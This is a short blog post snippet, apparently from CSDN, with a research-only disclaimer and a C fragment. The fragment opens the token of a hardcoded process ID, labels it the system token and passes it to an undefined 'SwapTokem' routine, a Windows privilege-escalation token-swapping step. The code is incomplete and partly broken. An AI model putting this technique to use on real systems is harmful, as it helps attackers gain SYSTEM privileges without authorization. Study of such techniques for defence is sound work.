版权声明:本人的作品仅供研究目的,如果读者利用本人的作品从事其他行为,与本人无关 https://blog.csdn.net/oShuangYue12/article/details/81412702
DWORD pid = 532;
HANDLE elevated_tokena=NULL;
HANDLE ProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION,
FALSE, pid);
if (ProcessHandle)
{
OpenProcessToken(ProcessHandle, TOKEN_QUERY, &elevated_tokena);
printf("[!] System Token is ValuePointeris:%p \%d\n", elevated_tokena, GetLastError());
}
if (elevated_tokena != NULL)
{
SwapTokem(elevated_tokena, argv[1]);
}